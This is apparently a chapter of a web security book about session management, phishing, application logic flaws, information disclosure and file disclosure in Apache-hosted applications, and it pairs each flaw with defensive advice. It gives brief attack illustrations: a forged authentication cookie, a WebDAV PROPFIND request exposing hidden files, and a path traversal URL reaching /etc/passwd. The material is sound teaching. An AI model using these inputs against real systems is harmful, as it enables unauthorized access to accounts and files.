This chapter covers web application security on a level that is appropriate for the profile of this book. That’s not an easy task: I’ve tried to adequately but succinctly cover all relevant points, without delving into programming too much.
To compensate for the lack of detail in some spots, I have provided a large collection of web application security links. In many cases the links point to security papers that were the first to introduce the problem, thereby expanding the web application security body of knowledge.
Unless you are a programmer, you will not need to concern yourself with every detail presented in this chapter. The idea is to grasp the main concepts and to be able to spot major flaws at first glance. Apply the 80/20 rule: invest 20 percent of the effort to get 80 percent of the desired results.
Web application security is difficult because a web application typically consists of many very different components glued together. A typical web application architecture is illustrated in Figure 10-1. In this figure, I have marked the locations where some frequent flaws and attacks occur.
To build secure applications, developers must be well acquainted with the individual components. In today’s world, where everything needs to be completed yesterday, security is often an afterthought. Other factors have contributed to the problem as well:
HTTP was originally designed for document exchange, but it evolved into an application deployment platform. Furthermore, HTTP is now used to transport whole new protocols (e.g., SOAP). Using one port to transport multiple protocols significantly reduces the ability of classic firewall architectures to control what traffic is allowed; it is only possible to either allow or deny everything that goes over a port.
The Web grew into a mandatory business tool. To remain competitive, companies must deploy web applications to interact with their customers and partners.
Being a plaintext protocol, HTTP does not require any special tools to perform exploitation. Most attacks can be performed manually, using a browser or a telnet client. In addition, many attacks are very easy to execute.
Security issues should be addressed at the beginning of web application development and throughout the development lifecycle. Every development team should have a security specialist on board. The specialist should be the one to educate other team members, spread awareness, and ensure there are no security lapses. Unfortunately this is often not possible in real life.
If you are a system administrator, you may be faced with a challenge to deploy and maintain systems of unknown quality. Even under the best of circumstances, when enough time is allocated to handle security issues, inevitable mistakes will cause security problems. Except for the small number of issues that are configuration errors, you can do little on the Apache level to remedy the problems discussed in this chapter. The bulk of your efforts should go toward creating a robust and defensible environment, which is firmly under your control. Other than that, focus on discovering the application flaws and the attacks that are carried out against them. (You can do this by following the practices described in Chapter 12, which discusses web intrusion detection and prevention.)
In this chapter, I cover the following:
Session management attacks
Attacks on clients (browsers)
Application logic flaws
Information disclosure
File disclosure
Injection attacks
Buffer overflows
Evasion techniques
Web application security resources
HTTP is a stateless protocol. It was never designed to handle sessions. Though this helped the Web take off, it presents a major problem for web application designers. No one anticipated the Web being used as an application platform. It would have been much better to have session management built right into the HTTP standard. But since it wasn’t, it is now re-implemented by every application separately. Cookies were designed to help with sessions but they fall short of finishing the job.
Cookies are a mechanism for web servers and web applications to remember some information about a client. Prior to their invention, there was no way to uniquely identify a client. The only other piece of information that can be used for identification is the IP address. Workstations on local networks often have static, routable IP addresses that rarely change. These addresses can be used for pretty reliable user tracking. But in most other situations, there are too many unknowns to use IP addresses for identification:
Sometimes workstations are configured to retrieve an unused IP address from a pool of addresses at boot time, usually using a DHCP server. If users turn off their computers daily, their IP addresses can (in theory) be different each day. Thus, an IP address used by one workstation one day can be assigned to a different workstation the next day.
Some workstations are not allowed to access web content directly and instead must do so through a web proxy (typically as a matter of corporate policy). The IP address of the proxy is all that is visible from the outside.
Some workstations think they are accessing the Web directly, but their traffic is being changed in real time by a device known as a Network Address Translator (NAT). The address of the NAT is all that is visible from the outside.
Dial-up users and many DSL users regularly get assigned a different IP address every time they connect to the Internet. Only a small percentage of dial-up users have their own IP addresses.
Some dial-up users (for example, those coming through AOL) can have a different IP address on each HTTP request, as their providers route their original requests through a cluster of transparent HTTP proxies.
Finally, some users do not want their IP addresses to be known. They configure their clients to use so-called open proxies and route HTTP requests through them. It is even possible to chain many proxies together and route requests through all of them at once.
Even in the case of a computer with a permanent real (routable) IP address, many users could be using the same workstation. User tracking via an IP address would, therefore, view all these users as a single user.
Something had to be done to identify users. With stateful protocols, you at least know the address of the client throughout the session. To solve the problem for stateless protocols, people at Netscape invented cookies. Perhaps Netscape engineers thought about fortune cookies when they thought of the name. Here is how they work:
Upon first visit (first HTTP request), the site stores information identifying a session into a cookie and sends the cookie to the browser.
The browser does not usually care about the content of a cookie (there are some exceptions as we shall see later), but it will send the cookie back to the site with every subsequent HTTP request.
The site, upon receiving the cookie, retrieves the information out of it and uses it for its operations.
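The three steps above can be sketched with Python’s standard http.cookies module. The cookie name and value here are made up for illustration; real applications choose their own:

```python
from http.cookies import SimpleCookie

# Step 1: the server builds a cookie identifying the session and
# emits it as a Set-Cookie response header.
server_cookie = SimpleCookie()
server_cookie["sessid"] = "3f9hba3578faf3c983"
server_cookie["sessid"]["path"] = "/"
print(server_cookie.output())  # Set-Cookie: sessid=3f9hba3578faf3c983; Path=/

# Step 2: the browser stores the value and returns it verbatim in a
# Cookie request header with every subsequent request.
request_header = "sessid=3f9hba3578faf3c983"

# Step 3: the server parses the Cookie header and recovers the value.
client_cookie = SimpleCookie(request_header)
print(client_cookie["sessid"].value)  # 3f9hba3578faf3c983
```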
There are two types of cookies:
Session cookies are sent from the server without an expiry date. Because of that they will only last as long as the browser application is open (the cookies are stored in memory). As soon as the browser closes (the whole browser application, not just the window that was used to access the site), the cookie disappears. Session cookies are used to simulate per-session persistence and create an illusion of a session. This is described in detail later in this chapter.
Persistent cookies are stored on disk and loaded every time the browser starts. These cookies have an expiry date and exist until the date is reached. They are used to store long-lived information about the user. For example, low-risk applications can use such cookies to recognize existing users and automatically log them in.
Cookies are transported using HTTP headers. Web servers send cookies in a Set-Cookie header. Clients return them in a Cookie header. Newer versions of the standard introduce the names Set-Cookie2 and Cookie2.
Clients normally send cookies back only to the servers where they originated, or servers that share the same domain name (and are thus assumed to be part of the same network).
To avoid DoS attacks by rogue web servers against browsers, some limits are imposed by the cookie specification (for example, the maximum length is limited and so is the total number of cookies).
Further information on cookies is available from:
“Persistent Client State: HTTP Cookies” (the original Netscape cookie proposal) (http://home.netscape.com/newsref/std/cookie_spec.html)
RFC 2965, “HTTP State Management Mechanism” (the IETF definition of the Cookie2 and Set-Cookie2 header fields) (http://www.ietf.org/rfc/rfc2965.txt)
RFC 2964, “Use of HTTP State Management” (http://www.ietf.org/rfc/rfc2964.txt)
Session management is closely related to authentication: authentication generally relies on session management, but the reverse does not hold, since sessions exist even when the user is not authenticated. Still, the concept is similar:
When a client comes to the application for the first time (or, more precisely, without having session information associated with it), a new session is created.
The application creates what is known as a session token (or session ID) and sends it back to the client.
If the client includes the session token with every subsequent request then the application can use its contents to match the request to the session.
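On the server, the exchange above amounts to a lookup table keyed by token. Here is a minimal sketch; the structure and function names are mine, not taken from any particular framework:

```python
import secrets

sessions = {}  # token -> per-session state

def start_session():
    """Create a new session and return the token sent to the client."""
    token = secrets.token_hex(16)  # 128 random bits, hard to guess
    sessions[token] = {"authenticated": False}
    return token

def lookup_session(token):
    """Match an incoming token to its session; None if unknown."""
    return sessions.get(token)

token = start_session()
assert lookup_session(token) is not None      # known token matches
assert lookup_session("forged-token") is None  # unknown token does not
```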
There are three ways to implement sessions:
For sessions to exist, a piece of information must be forwarded back and forth between the server and a client, and cookies were designed for that purpose. Using a cookie is easy: programmers simply need to pick a name for the cookie and store the session token inside.
With this approach, every page is changed to include an additional parameter containing the session token. Receiving such a parameter is easy. What is more complicated is ensuring every link in the page contains it. One way to do it is to programmatically construct every link (for GET requests) and every form (for POST requests). This is difficult. Another way is to have a page post-processing phase: when the page construction is completed, a script locates all links and forms and makes changes to include the session token. This is easier but does not always work. For example, if a link is generated in JavaScript code, the post-processor will not detect it to add the session token.
You can have the application embed the session token into the URL. For example, /view.php becomes something like /view.php/3f9hba3578faf3c983/. The beauty of this approach (for programmers) is that it does not require additional effort to make it work. A small piece of code strips out the session token before individual page processing starts, and the programmer is not even aware of how the session management works.
Cookies are by far the simplest mechanism to implement sessions and should always be the first choice. The other two mechanisms should be used as alternatives in cases where the user’s browser does not support cookies (or the user refuses to accept them).
Session tokens can be considered temporary passwords. As with all passwords, they must be difficult to guess or the whole session management scheme will collapse. Ideal session tokens should have the following characteristics:
Long
Not predictable (e.g., not issued sequentially)
Unique
The reasons for these requirements will become clear once we start to discuss different ways of breaking session management.
Attacks against session management are popular because of the potentially high gain. Once an attacker learns a session token, he gets instant access to the application with the privileges of the user whose session token he stole.
There are many ways to attempt to steal session tokens:
When the communication channel is not secure, no information is safe, session tokens included. The danger of someone tapping into the local traffic to retrieve session tokens is greatest when applications are used internally and there is a large concentration of users on the same LAN.
URL-based session management techniques are vulnerable in many ways. Someone looking over a shoulder could memorize or write down the session token and then resume the session from somewhere else.
Another issue with URL-based session management techniques is that session tokens can leak. Sometimes users themselves do it by copying a page URL into an email or to a message board.
As you may be aware, the Referer request header field contains the URL of the page from which a link was followed to the current page. If that URL contains a session token and the user follows a link to another (likely untrusted) site, the administrator of that site will be able to extract the session token from the access logs. Direct all external links through an intermediary internal script to prevent tokens from leaking this way.
Session tokens are created when they do not exist. But it is also possible for an attacker to create a session first and then send someone else a link with the session token embedded in it. The second person would assume the session, possibly performing authentication to establish trust, with the attacker knowing the session token all along. For more information, read the paper by Mitja Kolsek, of ACROS Security, entitled “Session Fixation Vulnerability in Web-based Applications” (http://www.acros.si/papers/session_fixation.pdf).
Cross-site scripting (XSS) attacks are a favorite method of stealing a session token from a client. By injecting a small piece of code into the victim’s browser, the session token can be delivered to the attacker. (XSS attacks are explained in Section 10.6.2 later in this chapter.)
If all else fails, an attacker can attempt to brute-force his way into an application. Applications will generate a new token if you do not supply one, and they typically completely fail to monitor brute-force attacks. An automated script can, in theory, work for days until it produces results.
The use of a flawed session token generation algorithm can dramatically shorten the time needed to brute-force a session. Excellent coverage of session brute-force attacks is provided in the following paper:
“Brute-Force Exploitation of Web Application Session IDs” by David Endler (iDEFENSE Labs) (http://www.blackhat.com/presentations/bh-usa-02/endler/iDEFENSE%20SessionIDs.pdf)
Typical session token problems include:
Tokens are short and can be cycled through easily.
Sequential session tokens are used.
Token values start repeating quickly.
Token generation is based on other predictable information, such as an IP address or time of session creation.
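The difference between a flawed and a sound token generator is easy to demonstrate. The sketch below contrasts a sequential counter (trivially predictable) with Python’s secrets module, a cryptographically strong source; both function names are illustrative only:

```python
import secrets

counter = 1000

def weak_token():
    # Sequential: an attacker who sees one token can guess its neighbors.
    global counter
    counter += 1
    return str(counter)

def strong_token():
    # 128 random bits: long, unique in practice, and not predictable.
    return secrets.token_hex(16)

print(weak_token(), weak_token())  # 1001 1002
print(strong_token())              # e.g., 32 hex characters of random data
```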
To conclude the discussion about session management, here are some best practices to demonstrate that a robust scheme requires serious thinking:
Create a session token upon first visit.
When performing authentication, destroy the old session and create a new one.
Limit session lifetime to a short period (a few hours).
Destroy inactive sessions regularly.
Destroy sessions after users log out.
Ask users to re-authenticate before an important task is performed (e.g., an order is placed).
Do not use the same session for a non-SSL part of the site as for the SSL part of the site because non-SSL traffic can be intercepted and the session token obtained from it. Treat them as two different servers.
If cookies are used to transport session tokens in an SSL application, they should be marked “secure.” Secure cookies are never sent over a non-SSL connection.
Regenerate session tokens from time to time.
Monitor client parameters (the IP address, the User-Agent request header) and send warnings to the error log when they change. Some information (e.g., the contents of the User-Agent header) should not change for the lifetime of a session. Invalidate the session if it does.
If you know where your users are coming from, attach each session to a single IP address, and do not allow the address to change.
If you can, do not accept users coming through web proxies. This will be difficult to do for most public sites but easier for internal applications.
If you can, do not accept users coming through open web proxies. Open proxies are used when users want to stay anonymous or otherwise hide their tracks. You can detect which proxies are open by extracting the IP address of the proxy from each proxied request and having a script automatically test whether the proxy is open or not.
If you do allow web proxies, consider using Java applets or Flash movies (probably a better choice since such movies can pretend to be regular animations) to detect the users’ real IP addresses. It’s a long shot but may work in some cases.
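Several of the practices above (short lifetimes, inactivity timeouts, User-Agent pinning) can be combined into a single validation routine that runs on every request. A sketch follows; the limits and field names are invented for illustration:

```python
MAX_LIFETIME = 4 * 3600  # destroy sessions after a few hours
MAX_IDLE = 30 * 60       # destroy inactive sessions

def session_valid(session, now, user_agent):
    """Return True only if the session passes every check."""
    if now - session["created"] > MAX_LIFETIME:
        return False  # absolute lifetime exceeded
    if now - session["last_seen"] > MAX_IDLE:
        return False  # inactive for too long
    if user_agent != session["user_agent"]:
        return False  # User-Agent must not change mid-session
    session["last_seen"] = now
    return True

s = {"created": 0, "last_seen": 0, "user_agent": "Mozilla/5.0"}
assert session_valid(s, 60, "Mozilla/5.0")
assert not session_valid(s, 60, "curl/7.0")        # changed User-Agent
assert not session_valid(s, 10**6, "Mozilla/5.0")  # lifetime expired
```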
An excellent overview of the problems of session management is available in the following paper:
“Web Based Session Management: Best practices in managing HTTP Based Client Sessions” by Gunter Ollmann (http://www.technicalinfo.net/papers/WebBasedSessionManagement.html)
Though attacks on clients are largely irrelevant for web application security (the exception being the use of JavaScript to steal session tokens), we will cover them briefly: if you are in charge of a web application deployment, you must consider every attack vector.
Here are some of the things that may be targeted:
Browser flaws
Java applets
Browser plug-ins (such as Flash or Shockwave)
JavaScript/VBScript embedded code
Attacking any of these is difficult. Most of the early flaws have been corrected. Someone may attempt to create a custom Mozilla plug-in or Internet Explorer ActiveX component, but succeeding with that requires the victim to willingly accept running the component. If your users are doing that, then you have a bigger problem with all the viruses spreading around. The same users can easily become victims of phishing (see the next section).
Internet Explorer is a frequent target because of its poor security record. In my opinion, Internet Explorer, Outlook, and Outlook Express should not be used in environments that require a high level of security until their security improves. You are better off using software such as Mozilla Suite (or now separate packages Firefox and Thunderbird).
Phishing is a shorter version of the term password fishing. It is used for attacks that try to trick users into submitting passwords and other sensitive private information to the attacker by posing as someone else. The process goes like this:
Someone makes a copy of a popular password-protected web site (we are assuming passwords are protecting something of value). Popular Internet sites such as Citibank, PayPal, and eBay are frequent targets.
This person sends forged email messages to thousands, or even millions, of users, pretending the messages are sent from the original web site and directing people to log in to the forged site. Attackers usually use various techniques to hide the real URL the users are visiting.
Naïve users will attempt to log in, and the attacker will record their usernames and passwords. The attacker can then redirect the user to the real site. The user, thinking there was a glitch, attempts to log in again (this time to the real site), succeeds, thinks everything is fine, and does not even notice the credentials were stolen.
The attacker can now access the original password-protected area and exploit this power, for example by transferring funds from the victim’s account to his own.
Now think of your precious web application; could your users become victims of a scam like this? If you think the chances are high, do the following:
Educate your users about potential dangers. Explain how you will never send emails asking them about their security details or providing links to log in. Provide a way for users to verify that the emails they receive are genuine (from you, not an attacker).
Restrict application access based on IP address and possibly based on time of access. This technique works, but you will be able to use it only for internal applications, where you can control where the users are logging in from.
Record who is logging on, when, and from which IP address. Then implement automated tools to establish usage patterns and detect anomalies.
Phishing is a real problem, and very difficult to solve. One solution may be to deploy SSL with client certificates required (or any other Type 2 authentication method, where users must have something with them to use for authentication). This will not prevent users from disclosing their credentials, but it will prevent the attacker from using them to access the site, because the attacker will be missing the appropriate certificate. Unfortunately, client certificates are difficult to use, so this solution only works for smaller applications and closely controlled user groups. A proper solution is yet to be determined but may revolve around the following ideas:
Deprecate insecure authentication methods, such as Basic authentication, because they send user credentials to the site verbatim.
Design new authentication methods (or upgrade Digest implementations) to allow for mutual authentication (clients to servers and servers to clients).
Upgrade the existing protocols to take the human factor into account as well.
Design better client applications (as discussed in Section 4.2.2 in Chapter 4).
Continue educating users.
No quick remedies will be created for the phishing problem, since none of the ideas will be easy to implement. The following resources are useful if you want to learn more about this subject:
Application logic flaws are the result of a lack of understanding of the web application programming model. Programmers are often deceived when something looks right and they believe it works right too. Most flaws can be tracked down to two basic errors:
Information that comes from the client is trusted and no (or little) validation is performed.
Process state is not maintained on the server (in the application).
I explain the errors and the flaws resulting from them through a series of examples.
Information stored in cookies and hidden form fields is not visible to the naked eye. However, it can be accessed easily by viewing the web page source (in the case of hidden fields) or by configuring the browser to display cookies as they arrive. Browsers generally do not allow anyone to change this information, but it can be done with the proper tools. (Paros, described in Appendix A, is one such tool.)
Because browsers do not normally allow users to change cookie information, some programmers use cookies to store sensitive information (application data). They send cookies to the client, accept them back, and then use the application data from the cookie in the application. However, the data has already been tainted.
Imagine an application that uses cookies to authenticate user sessions. Upon successful authentication, the application sends the following cookie to the client (I have emphasized the application data):
Set-Cookie: authenticated=true; path=/; domain=www.example.com

The application assumes that whoever has a cookie named authenticated containing true is an authenticated user. With such a concept of security, an attacker only needs to forge a cookie with the same content to access the application without knowing the username or the password.
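If application data must travel in a cookie at all, it should at least carry a message authentication code so that forged values are rejected. A sketch using Python’s hmac module follows; the key and the value layout are invented for illustration, and this is not the book’s prescribed fix:

```python
import hmac
import hashlib

SECRET_KEY = b"change-me"  # server-side secret, never sent to the client

def sign(value):
    """Produce 'value|mac' suitable for storing in a cookie."""
    mac = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}|{mac}"

def verify(cookie):
    """Return the value if the MAC checks out, else None."""
    value, _, mac = cookie.rpartition("|")
    expected = hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(mac, expected) else None

cookie = sign("authenticated=true")
assert verify(cookie) == "authenticated=true"
assert verify("authenticated=true|0000") is None  # forged cookie rejected
```

Even signed values can be replayed by whoever obtains them, so keeping the data in server-side session state remains the safer design.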
It is a similar story with hidden fields. When there is a need in the application to perform a two-step process, programmers will often perform half of the processing in the first step, display step one results to the user in a page, and transmit some internal data into the second step using hidden fields. Though browsers provide no means for users to change the hidden fields, specialized tools can. The correct approach is to use the early steps only to collect and validate data and then repeat validation and perform the main task in the final step.
Allowing users to interfere with application internal data often results in attackers being able to do the following:
Change product price (usually found in simpler shopping carts)
Gain administrative privileges (vertical privilege escalation)
Impersonate other users (horizontal privilege escalation)
An example of this type of flaw can be found in numerous form-to-email scripts. To enable web designers to have form data sent to email without doing any programming, all configuration data is stored as hidden form fields:
<form action="/cgi-bin/FormMail" method="POST">
<input type="hidden" name="subject" value="Call me back">
<input type="hidden" name="recipient" value="sales@example.com">
<!-- the visible part of the form follows here -->
</form>
As was the case with cookies, the recipient field can be manipulated to send email to any email address. Spammers were quick to exploit this type of fault, using form-to-email scripts to send unsolicited email messages.
Many form-to-email scripts still work this way but have been improved to send email only to certain domains, making them useless to spammers.
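The improvement mentioned above amounts to validating the attacker-controllable recipient field against an allowlist before sending anything. A sketch, with an illustrative domain list:

```python
ALLOWED_DOMAINS = {"example.com"}  # domains the script may deliver to

def recipient_allowed(address):
    """Accept only well-formed addresses in approved domains."""
    name, sep, domain = address.partition("@")
    return bool(name) and sep == "@" and domain in ALLOWED_DOMAINS

assert recipient_allowed("sales@example.com")
assert not recipient_allowed("victim@spam-target.net")  # spammer's target
assert not recipient_allowed("no-at-sign")              # malformed input
```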
Some believe the POST request method is more secure than GET. It is not. GET and POST both exist because they have different meanings, as explained in the HTTP specification:

GET requests should only cause information about a resource to be transmitted from the server to the client. They should never be used to change the resource.

POST requests should be used only to make changes to resources on the server.

Because a casual user cannot perform a POST request just like that (a GET request only requires typing the URL into the location field, while a POST request requires basic knowledge of HTML), people think POST requests are somehow safe. An example of this misplaced trust is given in the next section.
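In reality, crafting a POST request programmatically takes only a few lines, which is why the method by itself offers no protection. A sketch using Python’s standard library; the URL is a placeholder, and the request is built but not sent:

```python
from urllib.parse import urlencode
from urllib.request import Request

# Any attacker can construct this as easily as typing a URL.
data = urlencode({"recipient": "victim@example.com"}).encode()
req = Request("http://www.example.com/cgi-bin/FormMail",
              data=data)  # supplying a body makes this a POST

print(req.get_method())  # POST
```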
The referrer field is a special header field added to each request by HTTP clients (browsers). Not having been created by the server, its contents cannot be trusted. But a common mistake is to rely on the referrer field for security.
Early versions of many form-to-email scripts did exactly that. They checked the Referer request field (also known as HTTP_REFERER) and refused to work when its contents did not contain a proper address. This type of check has some value: because browsers populate the referrer field correctly, it becomes impossible to use the form-to-email script from another web site. However, it does not protect against spammers, who can programmatically create HTTP requests.
Process state management is difficult to do in web applications, and most programmers do not do it when they know they should. This is because most programming environments support stateless programming well, but do not help with stateful operations. Take a user registration process, for example, one that consists of three steps:
Choose a username.
Enter personal details.
Perform registration.
Choosing a username that is not already in use is vital for the process as a whole. The user should be allowed to continue on to the second step only after she chooses an unused username. However, a stateless implementation of this process does not remember a user’s past actions. So if the URL of the second step is easy to guess (e.g., register2.php), the user can type in the address and enter step 2 directly, supplying as a parameter a username that has not been validated (and possibly one that already exists).
Depending on how the rest of the process is coded, this can lead to an error at the end (in the best case) or to database inconsistency (in the worst case).
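The fix is to record progress on the server and refuse to run a step out of order. A minimal sketch of per-session state; the field name is mine:

```python
def enter_step(session, requested_step):
    """Allow a step only if the previous one was completed."""
    completed = session.get("completed_step", 0)
    if requested_step != completed + 1:
        return False  # e.g., jumping straight to register2.php
    session["completed_step"] = requested_step
    return True

session = {}
assert enter_step(session, 1)      # step 1: choose a username
assert not enter_step(session, 3)  # cannot skip ahead to registration
assert enter_step(session, 2)      # step 2: enter personal details
```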
Another good example of this problem is the use of form-to-email scripts for registration before file download. In many cases, this is a stateless two-step process. The source code will reveal the URL of the second page, which usually contains a link for direct download.
Relying only on client-side validation (JavaScript) to validate script input data is a result of a common misconception that the HTTP client is part of the web programming model. I cannot emphasize enough that it is not. From a security point of view, client-side JavaScript is only a mechanism that enhances the user experience, giving form feedback instantly instead of making the user wait for the request to travel to the server and return with results. Besides, it is perfectly normal (and happens often) that a browser does not support JavaScript at all, or that the user has turned it off to increase security.
Lack of server-side validation can lead to any of the problems described in this chapter. This problem is often easy to detect. In the worst case (validation only performed in the client) simply attempting to use a web application with JavaScript turned off will result in many errors in a vulnerable application. In most cases, however, it is necessary to test each input separately to detect where the vulnerabilities lie.
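The rule is simple: whatever the client-side JavaScript checks, the server must check again. A sketch of a server-side validator mirroring a typical client-side username check; the limits and character rules are invented:

```python
def validate_username(value):
    """Server-side check; never trust that the client enforced it."""
    if not (3 <= len(value) <= 20):
        return False  # enforce length limits on the server too
    return value.isalnum()  # letters and digits only

assert validate_username("alice99")
assert not validate_username("a")                  # too short
assert not validate_username("alice; DROP TABLE")  # forbidden characters
```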
The more bad guys know about your system, the easier it becomes to find a way to compromise it. Information disclosure refers to the family of flaws that reveal inside information.
There is more in HTML pages than most people see. A thorough analysis of HTML page source code can reveal useful information. The structure of the source code is itself important because it can tell a lot about the person who wrote it. You can judge that person’s design and programming skills and learn what to expect.
You can commonly find comments in HTML code. For web designers, it is the only place for comments other designers can see. Even programmers, who should be writing comments in code and not in HTML (comments in code are never sent to browsers) sometimes make a mistake and put in information that should not be there.
The JavaScript code can reveal even more about the coder’s personality. Parts of the code that deal with data validation can reveal information about application business rules. Programmers sometimes fail to implement data validation on the server side, relying on the client-side JavaScript instead. Knowing the business rules makes it easier to test for boundary cases.
Tools used to create pages often put comments in the code. Sometimes they reveal paths on the filesystem. You can identify the tool used, which may lead to other discoveries (see the “Predictable File Locations“ section below).
A directory listing is a dynamically generated page showing the contents of a requested folder. Web servers that create such listings are only trying to be helpful, and they usually do so only after realizing the default index file (index.html, index.php, etc.) is absent. Directory listings are sometimes served to the client even when a default index file exists, as a result of a web server vulnerability. This happens to be one of the most frequent Apache problems, as you can see from the following list of releases and their directory listing vulnerabilities. (The Common Vulnerabilities and Exposures numbers are in parentheses; see http://cve.mitre.org.)
v1.3.12 Requests can cause directory listing on NT (CVE-2000-0505).
v1.3.17 Requests can cause directory listing to be displayed (CVE-2001-0925).
v1.3.20 Multiviews can cause a directory listing to be displayed (CVE-2001-0731).
v1.3.20 Requests can cause directory listing to be displayed on Win32 (CVE-2001-0729).
A directory-listing service is not needed in most cases and should be turned off. Having a web server configured to produce directory listings where they are not required should be treated as a configuration error.
The problem with directory listings is in what they show, coupled with how people behave:
Many people do not understand that the absence of a link pointing to a file does not protect the file from those who know it is there.
Some people do know but think no one will find out (they are too lazy to set up a proper environment for sharing files).
Files are created by mistake (for example, file editors often create backup files), or are left there by mistake (for example, “I’ll put this file here just for a second and delete it later“).
In the worst-case scenario, a folder used exclusively to store files for download (some of which are private) will be left without a default file. The attacker only needs to enter the URL of the folder to gain access to the full list of files. Turning directory listings off (using Options -Indexes, as shown in Chapter 2) is essential, but it is not a complete solution, as you will see soon.
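As a reminder of how that is done, here is a hedged configuration sketch (the download folder path is hypothetical), not a prescription:

```apache
# Disable automatic directory listings everywhere
<Directory />
    Options -Indexes
</Directory>

# Re-enable them only for a folder that genuinely needs them
<Directory /var/www/htdocs/public-downloads>
    Options +Indexes
</Directory>
```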
Web Distributed Authoring and Versioning (WebDAV), defined at http://www.ietf.org/rfc/rfc2518.txt, is an extension of the HTTP protocol. It consists of several new request methods that are added on top of HTTP to allow functionality such as search (for files), copy, and delete. Left enabled on a web site, WebDAV will allow anyone to enumerate files on the site, even with all directory indexes in place or directory listings turned off.

What follows is a shortened response from using telnet to connect to a web site that contains only three files (the root folder counts as one) and then sending the PROPFIND request (new with WebDAV) asking for the contents of the web server root folder. Users browsing normally would get served index.html as the home page, but you can see how WebDAV reveals the existence of the file secret.data. I have emphasized the parts of the output that reveal the filenames.
$ telnet ivanristic.com 8080
Trying 217.160.182.153...
Connected to ivanristic.com.
Escape character is '^]'.
PROPFIND / HTTP/1.0
Depth: 1

HTTP/1.1 207 Multi-Status
Date: Sat, 22 May 2004 19:21:32 GMT
Server: Apache/2.0.49 (Unix) DAV/2 PHP/4.3.4
Connection: close
Content-Type: text/xml; charset="utf-8"

<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
  <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
    <D:href>/</D:href>
    <D:propstat>
      <D:prop>
        ...
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
    <D:href>/secret.data</D:href>
    <D:propstat>
      <D:prop>
        ...
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
  <D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
    <D:href>/index.html</D:href>
    <D:propstat>
      <D:prop>
        ...
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
</D:multistatus>
Information disclosure through WebDAV is a configuration error (WebDAV should never be enabled for the general public). I mention it here because the consequences are similar to those of providing unrestricted directory listings. Some Linux distributions used to ship with WebDAV enabled by default, resulting in many sites unwillingly exposing their file listings to the public.
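Where WebDAV is genuinely needed (for content authors, for example), it should be restricted rather than left open. A sketch along these lines, with a hypothetical location and password file, keeps PROPFIND and friends away from anonymous users:

```apache
# WebDAV only for authenticated content authors
<Location /repository>
    Dav On
    AuthType Basic
    AuthName "WebDAV Repository"
    AuthUserFile /usr/local/apache/conf/dav.users
    Require valid-user
</Location>
```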
“Secure by default” is not a concept appreciated by many application server vendors who deliver application servers in developer-friendly mode where each error results in a detailed message being displayed in the browser. Administrators are supposed to change the configuration before deployment but they often do not do so.
This behavior discloses a lot of information that would otherwise be invisible to an attacker. It allows attackers to detect other flaws (e.g., configuration flaws) and to learn where files are stored on the filesystem, leading to successful exploitation.
A correct strategy to deal with this problem is as follows. (See Chapter 2 for technical details.)
Configure server software (web server, application server, etc.) such that it does not display verbose error messages to end users and instead logs them into a log file.
Instruct developers to do the same for the applications, and have applications respond with HTTP status 500 whenever an error occurs.
Install custom error pages using the Apache ErrorDocument directive.
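As an illustration of the last point, a minimal sketch (the error page locations are examples only) could be:

```apache
# Replace verbose default error pages with generic ones
ErrorDocument 404 /errors/not-found.html
ErrorDocument 500 /errors/server-error.html
```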
If all else fails (you have to live with an application that behaves incorrectly and you cannot change it), a workaround is possible with Apache 2 and mod_security. Using output filtering (described in Chapter 12), error messages can be detected and replaced with less dangerous content before the response is delivered to the client.
Programmers often need a lot of information from an application to troubleshoot problems. This information is often presented at the bottom of each page when the application is being executed in debug mode. The information displayed includes:
Application configuration parameters (which may include passwords)
System environment variables
Request details (IP addresses, headers, request parameters)
Information that resulted from processing the request, such as script variables, or SQL queries
Various log messages
The effect of all this being disclosed to someone other than a developer can be devastating. The key question is, how does an application get into debug mode?
Programmers often use special request parameters, which work across the application. When such a method becomes known (and it often does), anyone appending the parameter (for example, debug=1) to a URL can switch the application into debug mode.
A slightly better approach is to use a password to protect the debug mode. Although better, chances are programmers will use a default password that does not change across application installations.
When a programming team sits behind a fixed set of IP addresses, they often configure the application to display debugging information automatically, upon detecting a “trusted” visitor. This approach is common for internal teams developing custom applications.
One of the safer approaches is to have debug mode as one of the application privileges and assign the privilege to certain accounts. This approach represents a good compromise and delegates debug mode authorization to central authorization code, where such a decision belongs.
My recommendation is to have the debug mode turned off completely for production systems (and when I say turned off, I mean commented out of the source code).
Alternatively, a special request parameter (password-protected) can be used as an indicator that debug mode is needed, but the information would be dumped to a place (such as a log file) where only a developer can access it.
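To make the privilege-based approach concrete, here is an illustrative Python sketch; the account names, privilege names, and functions are all made up for the example and do not come from any real application:

```python
# Illustrative sketch: debug mode as an application privilege, decided
# by central authorization code instead of a magic request parameter.
# Account and privilege names are hypothetical.

ACCOUNT_PRIVILEGES = {
    "dev1": {"debug"},   # a developer account
    "buyer1": set(),     # an ordinary user
}

def can_debug(username):
    # Central authorization check: is the account allowed to see
    # debugging output at all?
    return "debug" in ACCOUNT_PRIVILEGES.get(username, set())

def render_page(username, body):
    page = body
    if can_debug(username):
        # Debug details are shown only to privileged accounts; in
        # production they would rather go to a log file.
        page += "\n<!-- debug: request and environment details -->"
    return page
```

The point of the sketch is that the decision lives in one place (the authorization code), not scattered across pages as checks for a special parameter.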
File disclosure refers to the case when someone manages to download a file that would otherwise remain hidden or require special authorization.
Path traversal occurs when directory backreferences are used in a path to gain access to the parent folder of a subfolder. If the software running on a server fails to resolve backreferences, it may also fail to detect an attempt to access files stored outside the web server tree. This flaw is known as path traversal or directory traversal. It can exist in a web server (though most web servers have fixed these problems) or in application code. Programmers often make this mistake.
If it is a web server flaw, an attacker only needs to ask for a file she knows is there:
http://www.example.com/../../etc/passwd
Even when she doesn’t know where the document root is, she can simply increase the number of backreferences until she finds it.
